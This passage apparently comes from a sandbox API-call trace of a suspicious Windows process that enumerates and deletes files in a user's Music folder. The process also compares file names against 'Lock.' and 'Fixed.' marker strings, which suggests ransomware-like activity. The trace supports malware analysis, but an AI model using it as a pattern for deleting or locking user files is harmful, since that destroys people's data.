lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f70c0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0208.330] CryptReleaseContext (hProv=0xa7ca18, dwFlags=0x0) returned 1 [0208.330] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.330] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.330] FreeLibrary (hLibModule=0x76390000) returned 1 [0208.330] CloseHandle (hObject=0x524) returned 1 [0208.331] CloseHandle (hObject=0x510) returned 1 [0208.336] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.336] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.336] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\QibhfcBitUE3eN.wav", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\QibhfcBitUE3eN.wav", lpFilePart=0x8cedf4*="QibhfcBitUE3eN.wav") returned 0x28 [0208.336] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\QibhfcBitUE3eN.wav" (normalized: "c:\\users\\fd1hvy\\music\\qibhfcbitue3en.wav")) returned 0x20 [0208.336] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\QibhfcBitUE3eN.wav", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61645420, ftCreationTime.dwHighDateTime=0x1d5d6fe, ftLastAccessTime.dwLowDateTime=0xd7f19970, ftLastAccessTime.dwHighDateTime=0x1d5d188, ftLastWriteTime.dwLowDateTime=0xd7f19970, ftLastWriteTime.dwHighDateTime=0x1d5d188, nFileSizeHigh=0x0, nFileSizeLow=0x12ec0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="QibhfcBitUE3eN.wav", cAlternateFileName="QIBHFC~1.WAV")) returned 0x9e1cb8 [0208.336] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\QibhfcBitUE3eN.wav" (normalized: "c:\\users\\fd1hvy\\music\\qibhfcbitue3en.wav")) returned 1 [0208.340] FindNextFileW (in: hFindFile=0x9e1cb8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61645420, ftCreationTime.dwHighDateTime=0x1d5d6fe, ftLastAccessTime.dwLowDateTime=0xd7f19970, ftLastAccessTime.dwHighDateTime=0x1d5d188, ftLastWriteTime.dwLowDateTime=0xd7f19970, ftLastWriteTime.dwHighDateTime=0x1d5d188, nFileSizeHigh=0x0, nFileSizeLow=0x12ec0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="QibhfcBitUE3eN.wav", cAlternateFileName="QIBHFC~1.WAV")) returned 0 [0208.340] FindClose (in: hFindFile=0x9e1cb8 | out: hFindFile=0x9e1cb8) returned 1 [0208.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74e60 | out: hHeap=0x2af0000) returned 1 [0208.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0208.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.341] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0208.341] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0208.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7b0 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0208.341] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0208.341] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0208.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0208.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0208.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0208.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74ec8 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0208.342] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0208.342] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0208.343] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0208.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.343] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0208.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0208.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0208.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0208.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0208.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5f6c0 [0208.344] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\QibhfcBitUE3eN.wav", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\QibhfcBitUE3eN.wav", lpFilePart=0x8cf650*="QibhfcBitUE3eN.wav") returned 0x28 [0208.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f6c0 | out: hHeap=0x2af0000) returned 1 [0208.344] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\QibhfcBitUE3eN.wav" (normalized: "c:\\users\\fd1hvy\\music\\qibhfcbitue3en.wav")) returned 0xffffffff [0208.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74ec8 | out: hHeap=0x2af0000) returned 1 [0208.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.344] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.344] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0208.344] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.344] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0208.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0208.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0208.344] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0208.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0208.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0208.345] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXHKkgRMJbmq7xZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XHKkgRMJbmq7xZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HKkgRMJbmq7xZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KkgRMJbmq7xZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kgRMJbmq7xZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gRMJbmq7xZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RMJbmq7xZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MJbmq7xZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jbmq7xZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmq7xZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mq7xZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q7xZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7xZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZC.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0208.345] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0208.345] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0208.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0208.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0208.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0208.352] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0208.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0208.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0208.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0208.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0208.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0208.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0208.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.352] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0208.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0208.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2a) returned 0x2a73610 [0208.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXHKkgRMJbmq7xZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XHKkgRMJbmq7xZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HKkgRMJbmq7xZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KkgRMJbmq7xZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kgRMJbmq7xZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gRMJbmq7xZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RMJbmq7xZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MJbmq7xZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jbmq7xZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bmq7xZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mq7xZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q7xZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7xZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.353] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZC.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0208.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0208.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2a73648 [0208.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0208.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73648 | out: hHeap=0x2af0000) returned 1 [0208.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0208.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0208.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0208.353] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0208.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0208.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0208.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0208.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0208.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0208.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a697c0 | out: hHeap=0x2af0000) returned 1 [0208.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0208.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0208.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0208.354] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0208.354] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0208.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0208.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0208.355] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0208.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0208.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0208.355] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0208.355] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0208.355] RtlAllocateHeap (HeapHandle=0x2af0000, 